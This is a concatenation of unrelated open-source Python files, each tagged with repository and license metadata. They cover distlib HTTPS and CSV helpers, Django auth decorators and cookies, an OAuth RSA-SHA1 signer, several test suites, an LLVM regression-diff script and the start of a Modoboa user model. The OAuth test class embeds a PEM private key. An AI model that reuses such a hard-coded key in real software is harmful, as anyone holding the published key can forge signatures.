context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.options |= ssl.OP_NO_SSLv2
if self.cert_file:
context.load_cert_chain(self.cert_file, self.key_file)
kwargs = {}
if self.ca_certs:
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(cafile=self.ca_certs)
if getattr(ssl, 'HAS_SNI', False):
kwargs['server_hostname'] = self.host
self.sock = context.wrap_socket(sock, **kwargs)
if self.ca_certs and self.check_domain:
try:
match_hostname(self.sock.getpeercert(), self.host)
except CertificateError:
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
raise
class HTTPSHandler(BaseHTTPSHandler):
def __init__(self, ca_certs, check_domain=True):
BaseHTTPSHandler.__init__(self)
self.ca_certs = ca_certs
self.check_domain = check_domain
def _conn_maker(self, *args, **kwargs):
"""
This is called to create a connection instance. Normally you'd
pass a connection class to do_open, but it doesn't actually check for
a class, and just expects a callable. As long as we behave just as a
constructor would have, we should be OK. If it ever changes so that
we *must* pass a class, we'll create an UnsafeHTTPSConnection class
which just sets check_domain to False in the class definition, and
choose which one to pass to do_open.
"""
result = HTTPSConnection(*args, **kwargs)
if self.ca_certs:
result.ca_certs = self.ca_certs
result.check_domain = self.check_domain
return result
def https_open(self, req):
try:
return self.do_open(self._conn_maker, req)
except URLError as e:
if 'certificate verify failed' in str(e.reason):
raise CertificateError('Unable to verify server certificate '
'for %s' % req.host)
else:
raise
#
# To guard against mixing HTTP traffic with HTTPS (examples: a Man-In-The-
# Middle proxy using HTTP listens on port 443, or an index mistakenly serves
# HTML containing a http://xyz link when it should be https://xyz),
# you can use the following handler class, which does not allow HTTP traffic.
#
# It works by inheriting from HTTPHandler - so build_opener won't add a
# handler for HTTP itself.
#
class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler):
def http_open(self, req):
raise URLError('Unexpected HTTP request on what should be a secure '
'connection: %s' % req)
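# Editor's sketch: wiring the verified-HTTPS handlers above into an
# opener.  The CA-bundle path is hypothetical; build_opener is taken from
# the stdlib rather than from this module's compat imports.
def _example_https_only_opener():
    try:
        from urllib.request import build_opener    # Python 3
    except ImportError:
        from urllib2 import build_opener           # Python 2
    opener = build_opener(HTTPSOnlyHandler('/path/to/ca-bundle.pem'))
    return opener.open('https://pypi.org/simple/')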
#
# XML-RPC with timeouts
#
_ver_info = sys.version_info[:2]
if _ver_info == (2, 6):
class HTTP(httplib.HTTP):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class HTTPS(httplib.HTTPS):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class Transport(xmlrpclib.Transport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.Transport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, x509 = self.get_host_info(host)
if _ver_info == (2, 6):
result = HTTP(h, timeout=self.timeout)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPConnection(h)
result = self._connection[1]
return result
class SafeTransport(xmlrpclib.SafeTransport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.SafeTransport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, kwargs = self.get_host_info(host)
if not kwargs:
kwargs = {}
kwargs['timeout'] = self.timeout
if _ver_info == (2, 6):
result = HTTPS(host, None, **kwargs)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPSConnection(h, None,
**kwargs)
result = self._connection[1]
return result
class ServerProxy(xmlrpclib.ServerProxy):
def __init__(self, uri, **kwargs):
self.timeout = timeout = kwargs.pop('timeout', None)
# The above classes only come into play if a timeout
# is specified
if timeout is not None:
scheme, _ = splittype(uri)
use_datetime = kwargs.get('use_datetime', 0)
if scheme == 'https':
tcls = SafeTransport
else:
tcls = Transport
kwargs['transport'] = t = tcls(timeout, use_datetime=use_datetime)
self.transport = t
xmlrpclib.ServerProxy.__init__(self, uri, **kwargs)
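# Editor's sketch: a ServerProxy with a per-connection timeout, as enabled
# by the Transport/SafeTransport classes above.  The URL is hypothetical.
def _example_server_proxy():
    proxy = ServerProxy('https://pypi.org/pypi', timeout=10)
    return proxy     # calls made through the proxy now honour the timeout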
#
# CSV functionality. This is provided because on 2.x, the csv module can't
# handle Unicode. However, we need to deal with Unicode in e.g. RECORD files.
#
def _csv_open(fn, mode, **kwargs):
if sys.version_info[0] < 3:
mode += 'b'
else:
kwargs['newline'] = ''
return open(fn, mode, **kwargs)
class CSVBase(object):
defaults = {
'delimiter': str(','), # The strs are used because we need native
'quotechar': str('"'), # str in the csv API (2.x won't take
'lineterminator': str('\n') # Unicode)
}
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.stream.close()
class CSVReader(CSVBase):
def __init__(self, fn, **kwargs):
if 'stream' in kwargs:
stream = kwargs['stream']
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
self.stream = stream
else:
self.stream = _csv_open(fn, 'r')
self.reader = csv.reader(self.stream, **self.defaults)
def __iter__(self):
return self
def next(self):
result = next(self.reader)
if sys.version_info[0] < 3:
for i, item in enumerate(result):
if not isinstance(item, text_type):
result[i] = item.decode('utf-8')
return result
__next__ = next
class CSVWriter(CSVBase):
def __init__(self, fn, **kwargs):
self.stream = _csv_open(fn, 'w')
self.writer = csv.writer(self.stream, **self.defaults)
def writerow(self, row):
if sys.version_info[0] < 3:
r = []
for item in row:
if isinstance(item, text_type):
item = item.encode('utf-8')
r.append(item)
row = r
self.writer.writerow(row)
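# Editor's sketch: a round trip through the Unicode-safe CSV wrappers
# above, as used for RECORD-style files.  The file name is hypothetical.
def _example_csv_roundtrip(path='RECORD.example'):
    with CSVWriter(path) as writer:
        writer.writerow(['distlib/util.py', 'sha256=...', '42'])
    with CSVReader(path) as reader:
        for row in reader:
            print(row)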
|
piyush82/icclab-rcb-web
|
virtualenv/lib/python2.7/site-packages/pip/vendor/distlib/util.py
|
Python
|
apache-2.0
| 42,456
|
from functools import wraps
from urllib.parse import urlparse
from django.conf import settings
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.core.exceptions import PermissionDenied
from django.shortcuts import resolve_url
def user_passes_test(test_func, login_url=None, redirect_field_name=REDIRECT_FIELD_NAME):
"""
Decorator for views that checks that the user passes the given test,
redirecting to the log-in page if necessary. The test should be a callable
that takes the user object and returns True if the user passes.
"""
def decorator(view_func):
@wraps(view_func)
def _wrapped_view(request, *args, **kwargs):
if test_func(request.user):
return view_func(request, *args, **kwargs)
path = request.build_absolute_uri()
resolved_login_url = resolve_url(login_url or settings.LOGIN_URL)
# If the login url is the same scheme and net location then just
# use the path as the "next" url.
login_scheme, login_netloc = urlparse(resolved_login_url)[:2]
current_scheme, current_netloc = urlparse(path)[:2]
if ((not login_scheme or login_scheme == current_scheme) and
(not login_netloc or login_netloc == current_netloc)):
path = request.get_full_path()
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(
path, resolved_login_url, redirect_field_name)
return _wrapped_view
return decorator
def login_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url=None):
"""
Decorator for views that checks that the user is logged in, redirecting
to the log-in page if necessary.
"""
actual_decorator = user_passes_test(
lambda u: u.is_authenticated,
login_url=login_url,
redirect_field_name=redirect_field_name
)
if function:
return actual_decorator(function)
return actual_decorator
def permission_required(perm, login_url=None, raise_exception=False):
"""
Decorator for views that checks whether a user has a particular permission
enabled, redirecting to the log-in page if necessary.
If the raise_exception parameter is given the PermissionDenied exception
is raised.
"""
def check_perms(user):
if isinstance(perm, str):
perms = (perm,)
else:
perms = perm
# First check if the user has the permission (even anon users)
if user.has_perms(perms):
return True
# In case the 403 handler should be called raise the exception
if raise_exception:
raise PermissionDenied
# As the last resort, show the login form
return False
return user_passes_test(check_perms, login_url=login_url)
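# Editor's sketch (not part of Django): typical use of the decorators
# above.  View names and the permission string are hypothetical.
def _example_views():
    from django.http import HttpResponse

    @login_required
    def profile(request):
        return HttpResponse("only for authenticated users")

    @permission_required("polls.add_choice", raise_exception=True)
    def add_choice(request):
        return HttpResponse("requires the polls.add_choice permission")

    return profile, add_choice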
|
sametmax/Django--an-app-at-a-time
|
ignore_this_directory/django/contrib/auth/decorators.py
|
Python
|
mit
| 2,892
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that actions which are not depended on by other targets get executed.
"""
import TestGyp
test = TestGyp.TestGyp()
test.run_gyp('bare.gyp', chdir='src')
test.relocate('src', 'relocate/src')
test.build('bare.gyp', chdir='relocate/src')
file_content = 'Hello from bare.py\n'
test.built_file_must_match('out.txt', file_content, chdir='relocate/src')
test.pass_test()
|
ibc/MediaSoup
|
worker/deps/gyp/test/actions-bare/gyptest-bare.py
|
Python
|
isc
| 558
|
#!/usr/bin/python
"""
requires tlslite - http://trevp.net/tlslite/
"""
import binascii
import base64
try:
from gdata.tlslite.utils import keyfactory
except ImportError:
from tlslite.tlslite.utils import keyfactory
try:
from gdata.tlslite.utils import cryptomath
except ImportError:
from tlslite.tlslite.utils import cryptomath
# XXX andy: ugly local import due to module name, oauth.oauth
import gdata.oauth as oauth
class OAuthSignatureMethod_RSA_SHA1(oauth.OAuthSignatureMethod):
def get_name(self):
return "RSA-SHA1"
def _fetch_public_cert(self, oauth_request):
# not implemented yet, ideas are:
# (1) do a lookup in a table of trusted certs keyed off of consumer
# (2) fetch via http using a url provided by the requester
# (3) some sort of specific discovery code based on request
#
# either way should return a string representation of the certificate
raise NotImplementedError
def _fetch_private_cert(self, oauth_request):
# not implemented yet, ideas are:
# (1) do a lookup in a table of trusted certs keyed off of consumer
#
# either way should return a string representation of the certificate
raise NotImplementedError
def build_signature_base_string(self, oauth_request, consumer, token):
sig = (
oauth.escape(oauth_request.get_normalized_http_method()),
oauth.escape(oauth_request.get_normalized_http_url()),
oauth.escape(oauth_request.get_normalized_parameters()),
)
key = ''
raw = '&'.join(sig)
return key, raw
def build_signature(self, oauth_request, consumer, token):
key, base_string = self.build_signature_base_string(oauth_request,
consumer,
token)
# Fetch the private key cert based on the request
cert = self._fetch_private_cert(oauth_request)
# Pull the private key from the certificate
privatekey = keyfactory.parsePrivateKey(cert)
# Convert base_string to bytes
#base_string_bytes = cryptomath.createByteArraySequence(base_string)
# Sign using the key
signed = privatekey.hashAndSign(base_string)
return binascii.b2a_base64(signed)[:-1]
def check_signature(self, oauth_request, consumer, token, signature):
        decoded_sig = base64.b64decode(signature)
key, base_string = self.build_signature_base_string(oauth_request,
consumer,
token)
# Fetch the public key cert based on the request
cert = self._fetch_public_cert(oauth_request)
# Pull the public key from the certificate
publickey = keyfactory.parsePEMKey(cert, public=True)
# Check the signature
ok = publickey.hashAndVerify(decoded_sig, base_string)
return ok
class TestOAuthSignatureMethod_RSA_SHA1(OAuthSignatureMethod_RSA_SHA1):
def _fetch_public_cert(self, oauth_request):
cert = """
-----BEGIN CERTIFICATE-----
MIIBpjCCAQ+gAwIBAgIBATANBgkqhkiG9w0BAQUFADAZMRcwFQYDVQQDDA5UZXN0
IFByaW5jaXBhbDAeFw03MDAxMDEwODAwMDBaFw0zODEyMzEwODAwMDBaMBkxFzAV
BgNVBAMMDlRlc3QgUHJpbmNpcGFsMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB
gQC0YjCwIfYoprq/FQO6lb3asXrxLlJFuCvtinTF5p0GxvQGu5O3gYytUvtC2JlY
zypSRjVxwxrsuRcP3e641SdASwfrmzyvIgP08N4S0IFzEURkV1wp/IpH7kH41Etb
mUmrXSwfNZsnQRE5SYSOhh+LcK2wyQkdgcMv11l4KoBkcwIDAQABMA0GCSqGSIb3
DQEBBQUAA4GBAGZLPEuJ5SiJ2ryq+CmEGOXfvlTtEL2nuGtr9PewxkgnOjZpUy+d
4TvuXJbNQc8f4AMWL/tO9w0Fk80rWKp9ea8/df4qMq5qlFWlx6yOLQxumNOmECKb
WpkUQDIDJEoFUzKMVuJf4KO/FJ345+BNLGgbJ6WujreoM1X/gYfdnJ/J
-----END CERTIFICATE-----
"""
return cert
def _fetch_private_cert(self, oauth_request):
cert = """
-----BEGIN PRIVATE KEY-----
MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBALRiMLAh9iimur8V
A7qVvdqxevEuUkW4K+2KdMXmnQbG9Aa7k7eBjK1S+0LYmVjPKlJGNXHDGuy5Fw/d
7rjVJ0BLB+ubPK8iA/Tw3hLQgXMRRGRXXCn8ikfuQfjUS1uZSatdLB81mydBETlJ
hI6GH4twrbDJCR2Bwy/XWXgqgGRzAgMBAAECgYBYWVtleUzavkbrPjy0T5FMou8H
X9u2AC2ry8vD/l7cqedtwMPp9k7TubgNFo+NGvKsl2ynyprOZR1xjQ7WgrgVB+mm
uScOM/5HVceFuGRDhYTCObE+y1kxRloNYXnx3ei1zbeYLPCHdhxRYW7T0qcynNmw
rn05/KO2RLjgQNalsQJBANeA3Q4Nugqy4QBUCEC09SqylT2K9FrrItqL2QKc9v0Z
zO2uwllCbg0dwpVuYPYXYvikNHHg+aCWF+VXsb9rpPsCQQDWR9TT4ORdzoj+Nccn
qkMsDmzt0EfNaAOwHOmVJ2RVBspPcxt5iN4HI7HNeG6U5YsFBb+/GZbgfBT3kpNG
WPTpAkBI+gFhjfJvRw38n3g/+UeAkwMI2TJQS4n8+hid0uus3/zOjDySH3XHCUno
cn1xOJAyZODBo47E+67R4jV1/gzbAkEAklJaspRPXP877NssM5nAZMU0/O/NGCZ+
3jPgDUno6WbJn5cqm8MqWhW1xGkImgRk+fkDBquiq4gPiT898jusgQJAd5Zrr6Q8
AO/0isr/3aa6O6NLQxISLKcPDk2NOccAfS/xOtfOz4sJYM3+Bs4Io9+dZGSDCA54
Lw03eHTNQghS0A==
-----END PRIVATE KEY-----
"""
return cert
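# Editor's sketch: signing a request with the RSA-SHA1 method above,
# using the test subclass that embeds throwaway certificates.  The
# consumer values and URL are hypothetical.
def _example_sign():
    method = TestOAuthSignatureMethod_RSA_SHA1()
    consumer = oauth.OAuthConsumer('consumer-key', 'consumer-secret')
    request = oauth.OAuthRequest(http_method='GET',
                                 http_url='http://example.com/photos')
    return method.build_signature(request, consumer, token=None)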
|
boxed/CMi
|
web_frontend/gdata/oauth/rsa.py
|
Python
|
mit
| 4,676
|
from __future__ import absolute_import, unicode_literals
from django.utils.encoding import force_str
from django.utils import six
from django.utils.six.moves import http_cookies
# Some versions of Python 2.7 and later won't need this encoding bug fix:
_cookie_encodes_correctly = http_cookies.SimpleCookie().value_encode(';') == (';', '"\\073"')
# See ticket #13007, http://bugs.python.org/issue2193 and http://trac.edgewall.org/ticket/2256
_tc = http_cookies.SimpleCookie()
try:
_tc.load(str('foo:bar=1'))
_cookie_allows_colon_in_names = True
except http_cookies.CookieError:
_cookie_allows_colon_in_names = False
if _cookie_encodes_correctly and _cookie_allows_colon_in_names:
SimpleCookie = http_cookies.SimpleCookie
else:
Morsel = http_cookies.Morsel
class SimpleCookie(http_cookies.SimpleCookie):
if not _cookie_encodes_correctly:
def value_encode(self, val):
# Some browsers do not support quoted-string from RFC 2109,
# including some versions of Safari and Internet Explorer.
# These browsers split on ';', and some versions of Safari
# are known to split on ', '. Therefore, we encode ';' and ','
# SimpleCookie already does the hard work of encoding and decoding.
# It uses octal sequences like '\\012' for newline etc.
# and non-ASCII chars. We just make use of this mechanism, to
# avoid introducing two encoding schemes which would be confusing
# and especially awkward for javascript.
# NB, contrary to Python docs, value_encode returns a tuple containing
# (real val, encoded_val)
val, encoded = super(SimpleCookie, self).value_encode(val)
encoded = encoded.replace(";", "\\073").replace(",","\\054")
# If encoded now contains any quoted chars, we need double quotes
# around the whole string.
if "\\" in encoded and not encoded.startswith('"'):
encoded = '"' + encoded + '"'
return val, encoded
if not _cookie_allows_colon_in_names:
def load(self, rawdata):
self.bad_cookies = set()
if six.PY2 and isinstance(rawdata, six.text_type):
rawdata = force_str(rawdata)
super(SimpleCookie, self).load(rawdata)
for key in self.bad_cookies:
del self[key]
# override private __set() method:
        # (needed for using our Morsel, and for laxness with CookieError)
def _BaseCookie__set(self, key, real_value, coded_value):
key = force_str(key)
try:
M = self.get(key, Morsel())
M.set(key, real_value, coded_value)
dict.__setitem__(self, key, M)
except http_cookies.CookieError:
self.bad_cookies.add(key)
dict.__setitem__(self, key, http_cookies.Morsel())
def parse_cookie(cookie):
if cookie == '':
return {}
if not isinstance(cookie, http_cookies.BaseCookie):
try:
c = SimpleCookie()
c.load(cookie)
except http_cookies.CookieError:
# Invalid cookie
return {}
else:
c = cookie
cookiedict = {}
for key in c.keys():
cookiedict[key] = c.get(key).value
return cookiedict
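# Editor's sketch: parse_cookie() above flattens a raw Cookie header into
# a plain dict and returns {} for input it cannot parse at all.
def _example_parse_cookie():
    print(parse_cookie('sessionid=abc123; csrftoken=xyz'))
    # expected: {'sessionid': 'abc123', 'csrftoken': 'xyz'}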
|
edisonlz/fruit
|
web_project/base/site-packages/django/http/cookie.py
|
Python
|
apache-2.0
| 3,531
|
#! /usr/bin/env python
from __future__ import division, absolute_import, print_function
# System imports
from distutils.util import get_platform
import os
import sys
import unittest
# Import NumPy
import numpy as np
major, minor = [ int(d) for d in np.__version__.split(".")[:2] ]
if major == 0: BadListError = TypeError
else: BadListError = ValueError
# Add the distutils-generated build directory to the python search path and then
# import the extension module
libDir = "lib.%s-%s" % (get_platform(), sys.version[:3])
sys.path.insert(0, os.path.join("build", libDir))
import Farray
######################################################################
class FarrayTestCase(unittest.TestCase):
def setUp(self):
self.nrows = 5
self.ncols = 4
self.array = Farray.Farray(self.nrows, self.ncols)
def testConstructor1(self):
"Test Farray size constructor"
self.failUnless(isinstance(self.array, Farray.Farray))
def testConstructor2(self):
"Test Farray copy constructor"
for i in range(self.nrows):
for j in range(self.ncols):
self.array[i, j] = i + j
arrayCopy = Farray.Farray(self.array)
self.failUnless(arrayCopy == self.array)
def testConstructorBad1(self):
"Test Farray size constructor, negative nrows"
self.assertRaises(ValueError, Farray.Farray, -4, 4)
def testConstructorBad2(self):
"Test Farray size constructor, negative ncols"
self.assertRaises(ValueError, Farray.Farray, 4, -4)
def testNrows(self):
"Test Farray nrows method"
self.failUnless(self.array.nrows() == self.nrows)
def testNcols(self):
"Test Farray ncols method"
self.failUnless(self.array.ncols() == self.ncols)
def testLen(self):
"Test Farray __len__ method"
self.failUnless(len(self.array) == self.nrows*self.ncols)
def testSetGet(self):
"Test Farray __setitem__, __getitem__ methods"
m = self.nrows
n = self.ncols
for i in range(m):
for j in range(n):
self.array[i, j] = i*j
for i in range(m):
for j in range(n):
self.failUnless(self.array[i, j] == i*j)
def testSetBad1(self):
"Test Farray __setitem__ method, negative row"
self.assertRaises(IndexError, self.array.__setitem__, (-1, 3), 0)
def testSetBad2(self):
"Test Farray __setitem__ method, negative col"
self.assertRaises(IndexError, self.array.__setitem__, (1, -3), 0)
def testSetBad3(self):
"Test Farray __setitem__ method, out-of-range row"
self.assertRaises(IndexError, self.array.__setitem__, (self.nrows+1, 0), 0)
def testSetBad4(self):
"Test Farray __setitem__ method, out-of-range col"
self.assertRaises(IndexError, self.array.__setitem__, (0, self.ncols+1), 0)
def testGetBad1(self):
"Test Farray __getitem__ method, negative row"
self.assertRaises(IndexError, self.array.__getitem__, (-1, 3))
def testGetBad2(self):
"Test Farray __getitem__ method, negative col"
self.assertRaises(IndexError, self.array.__getitem__, (1, -3))
def testGetBad3(self):
"Test Farray __getitem__ method, out-of-range row"
self.assertRaises(IndexError, self.array.__getitem__, (self.nrows+1, 0))
def testGetBad4(self):
"Test Farray __getitem__ method, out-of-range col"
self.assertRaises(IndexError, self.array.__getitem__, (0, self.ncols+1))
def testAsString(self):
"Test Farray asString method"
result = """\
[ [ 0, 1, 2, 3 ],
[ 1, 2, 3, 4 ],
[ 2, 3, 4, 5 ],
[ 3, 4, 5, 6 ],
[ 4, 5, 6, 7 ] ]
"""
for i in range(self.nrows):
for j in range(self.ncols):
self.array[i, j] = i+j
self.failUnless(self.array.asString() == result)
def testStr(self):
"Test Farray __str__ method"
result = """\
[ [ 0, -1, -2, -3 ],
[ 1, 0, -1, -2 ],
[ 2, 1, 0, -1 ],
[ 3, 2, 1, 0 ],
[ 4, 3, 2, 1 ] ]
"""
for i in range(self.nrows):
for j in range(self.ncols):
self.array[i, j] = i-j
self.failUnless(str(self.array) == result)
def testView(self):
"Test Farray view method"
for i in range(self.nrows):
for j in range(self.ncols):
self.array[i, j] = i+j
a = self.array.view()
self.failUnless(isinstance(a, np.ndarray))
self.failUnless(a.flags.f_contiguous)
for i in range(self.nrows):
for j in range(self.ncols):
self.failUnless(a[i, j] == i+j)
######################################################################
if __name__ == "__main__":
# Build the test suite
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(FarrayTestCase))
# Execute the test suite
print("Testing Classes of Module Farray")
print("NumPy version", np.__version__)
print()
result = unittest.TextTestRunner(verbosity=2).run(suite)
sys.exit(bool(result.errors + result.failures))
|
ddasilva/numpy
|
tools/swig/test/testFarray.py
|
Python
|
bsd-3-clause
| 5,156
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Password Encryption',
'version': '1.1',
'author': ['OpenERP SA', 'FS3'],
'maintainer': 'OpenERP SA',
'website': 'http://www.openerp.com',
'category': 'Tools',
'description': """
Encrypted passwords
===================
Interaction with LDAP authentication:
-------------------------------------
This module is currently not compatible with the ``user_ldap`` module and
will disable LDAP authentication completely if installed at the same time.
""",
'depends': ['base'],
'data': [],
'auto_install': False,
'installable': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
jmesteve/saas3
|
openerp/addons/auth_crypt/__openerp__.py
|
Python
|
agpl-3.0
| 1,628
|
#!/usr/bin/env python
import re, string, sys, os, time, math
DEBUG = 0
(tp, exp) = ('compile', 'exec')
def parse(file):
f = open(file, 'r')
d = f.read()
# Cleanup weird stuff
d = re.sub(r',\d+:\d', '', d)
r = re.findall(r'TEST-(PASS|FAIL|RESULT.*?):\s+(.*?)\s+(.*?)\r*\n', d)
test = {}
fname = ''
for t in r:
if DEBUG:
print t
if t[0] == 'PASS' or t[0] == 'FAIL' :
tmp = t[2].split('llvm-test/')
if DEBUG:
print tmp
if len(tmp) == 2:
fname = tmp[1].strip('\r\n')
else:
fname = tmp[0].strip('\r\n')
if not test.has_key(fname):
test[fname] = {}
test[fname][t[1] + ' state'] = t[0]
test[fname][t[1] + ' time'] = float('nan')
else :
try:
n = t[0].split('RESULT-')[1]
if DEBUG:
print "n == ", n;
if n == 'compile-success':
test[fname]['compile time'] = float(t[2].split('program')[1].strip('\r\n'))
elif n == 'exec-success':
test[fname]['exec time'] = float(t[2].split('program')[1].strip('\r\n'))
if DEBUG:
print test[fname][string.replace(n, '-success', '')]
else :
# print "ERROR!"
sys.exit(1)
except:
continue
return test
# Diff results and look for regressions.
def diffResults(d_old, d_new):
regressions = {}
passes = {}
removed = ''
for x in ['compile state', 'compile time', 'exec state', 'exec time']:
regressions[x] = ''
passes[x] = ''
for t in sorted(d_old.keys()) :
if d_new.has_key(t):
# Check if the test passed or failed.
for x in ['compile state', 'compile time', 'exec state', 'exec time']:
if not d_old[t].has_key(x) and not d_new[t].has_key(x):
continue
if d_old[t].has_key(x):
if d_new[t].has_key(x):
if d_old[t][x] == 'PASS':
if d_new[t][x] != 'PASS':
regressions[x] += t + "\n"
else:
if d_new[t][x] == 'PASS':
passes[x] += t + "\n"
else :
regressions[x] += t + "\n"
if x == 'compile state' or x == 'exec state':
continue
# For execution time, if there is no result it's a fail.
if not d_old[t].has_key(x) and not d_new[t].has_key(x):
continue
            elif not d_new[t].has_key(x):
                regressions[x] += t + "\n"
                continue  # no new result, nothing to compare numerically
            elif not d_old[t].has_key(x):
                passes[x] += t + "\n"
                continue  # no old result, nothing to compare numerically
if math.isnan(d_old[t][x]) and math.isnan(d_new[t][x]):
continue
elif math.isnan(d_old[t][x]) and not math.isnan(d_new[t][x]):
passes[x] += t + "\n"
elif not math.isnan(d_old[t][x]) and math.isnan(d_new[t][x]):
regressions[x] += t + ": NaN%\n"
if d_new[t][x] > d_old[t][x] and d_old[t][x] > 0.0 and \
(d_new[t][x] - d_old[t][x]) / d_old[t][x] > .05:
regressions[x] += t + ": " + "{0:.1f}".format(100 * (d_new[t][x] - d_old[t][x]) / d_old[t][x]) + "%\n"
else :
removed += t + "\n"
if len(regressions['compile state']) != 0:
print 'REGRESSION: Compilation Failed'
print regressions['compile state']
if len(regressions['exec state']) != 0:
print 'REGRESSION: Execution Failed'
print regressions['exec state']
if len(regressions['compile time']) != 0:
print 'REGRESSION: Compilation Time'
print regressions['compile time']
if len(regressions['exec time']) != 0:
print 'REGRESSION: Execution Time'
print regressions['exec time']
if len(passes['compile state']) != 0:
print 'NEW PASSES: Compilation'
print passes['compile state']
if len(passes['exec state']) != 0:
print 'NEW PASSES: Execution'
print passes['exec state']
if len(removed) != 0:
print 'REMOVED TESTS'
print removed
# Main
if len(sys.argv) < 3 :
print 'Usage:', sys.argv[0], '<old log> <new log>'
sys.exit(-1)
d_old = parse(sys.argv[1])
d_new = parse(sys.argv[2])
diffResults(d_old, d_new)
|
dslab-epfl/asap
|
utils/release/findRegressions-simple.py
|
Python
|
bsd-2-clause
| 4,045
|
import os
import sys
import random
import unittest
sys.path.insert(1, os.path.abspath(os.path.join(__file__, "../..")))
import base_test
repo_root = os.path.abspath(os.path.join(__file__, "../../.."))
sys.path.insert(1, os.path.join(repo_root, "tools", "webdriver"))
from webdriver import exceptions
class SendKeysTest(base_test.WebDriverBaseTest):
def setUp(self):
self.driver.get(self.webserver.where_is("user_input/res/text-form.html"))
def test_send_simple_string(self):
element = self.driver.find_element_by_id("Text1")
element.send_keys("lorem ipsum")
self.assertEquals(self.driver.find_element_by_id("text").get_text(), u"lorem ipsum")
def test_send_return(self):
element = self.driver.find_element_by_id("Text1")
returnkey = unichr(int("E006", 16))
element.send_keys([returnkey])
self.assertEquals(u"" + self.driver.get_current_url(), u"" + self.webserver.where_is("user_input/res/text-form-landing.html?e=mc2"))
def test_send_backspace(self):
element = self.driver.find_element_by_id("Text1")
element.send_keys("world ")
element.send_keys("wide ")
element.send_keys("web ")
element.send_keys("consortium")
backspace= unichr(int("E003", 16))
for i in range(0, 11):
element.send_keys([backspace])
self.assertEquals(self.driver.find_element_by_id("text").get_text(), u"world wide web")
def test_send_tab(self):
element1 = self.driver.find_element_by_id("Text1")
element2 = self.driver.find_element_by_id("Text2")
element1.send_keys("typing here")
tab= unichr(int("E004", 16))
element1.send_keys([tab])
output = self.driver.find_element_by_id("output")
tab_pressed = output.get_attribute("checked")
self.assertEquals(tab_pressed, u"true")
def test_send_shift(self):
element = self.driver.find_element_by_id("Text1")
element.send_keys("low ")
shift= unichr(int("E008", 16))
element.send_keys([shift , "u", "p", shift])
self.assertEquals(self.driver.find_element_by_id("text").get_text(), u"low UP")
def test_send_arrow_keys(self):
element = self.driver.find_element_by_id("Text1")
element.send_keys("internet")
backspace= unichr(int("E003", 16))
left= unichr(int("E012", 16))
right= unichr(int("E014", 16))
for i in range(0, 4):
element.send_keys([left])
element.send_keys([backspace])
element.send_keys([right])
element.send_keys("a")
self.assertEquals(self.driver.find_element_by_id("text").get_text(), u"intranet")
def test_select_text_with_shift(self):
element = self.driver.find_element_by_id("Text1")
element.send_keys("WebDriver")
backspace= unichr(int("E003", 16))
shift= unichr(int("E008", 16))
left= unichr(int("E012", 16))
element.send_keys([shift, left, left, left, left, left, left, backspace])
self.assertEquals(self.driver.find_element_by_id("text").get_text(), u"Web")
if __name__ == "__main__":
unittest.main()
|
youtube/cobalt
|
third_party/web_platform_tests/webdriver/user_input/sendkeys_test.py
|
Python
|
bsd-3-clause
| 3,188
|
"""Core models."""
import re
from email.header import Header
from django.conf import settings
from django.db import models
from django.urls import reverse
from django.utils.encoding import force_str, smart_bytes, smart_text
from django.utils.functional import cached_property
from django.utils.translation import ugettext as _, ugettext_lazy
from django.contrib.auth.models import AbstractUser, Group
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
import jsonfield
from phonenumber_field.modelfields import PhoneNumberField
from reversion import revisions as reversion
from modoboa.core.password_hashers import get_password_hasher
from modoboa.lib.exceptions import (
BadRequest, Conflict, InternalError, PermDeniedException
)
from modoboa.parameters import tools as param_tools
from . import constants, signals
try:
from modoboa.lib.ldap_utils import LDAPAuthBackend
ldap_available = True
except ImportError:
ldap_available = False
class User(AbstractUser):
"""Custom User model.
It overloads the way passwords are stored into the database. The
main reason to change this mechanism is to ensure the
compatibility with the way Dovecot stores passwords.
It also adds new attributes and methods.
"""
username = models.CharField(max_length=254, unique=True)
email = models.EmailField(max_length=254, blank=True, db_index=True)
is_staff = models.BooleanField(default=False, db_index=True)
is_active = models.BooleanField(default=True, db_index=True)
is_local = models.BooleanField(default=True, db_index=True)
master_user = models.BooleanField(
ugettext_lazy("Allow mailboxes access"), default=False,
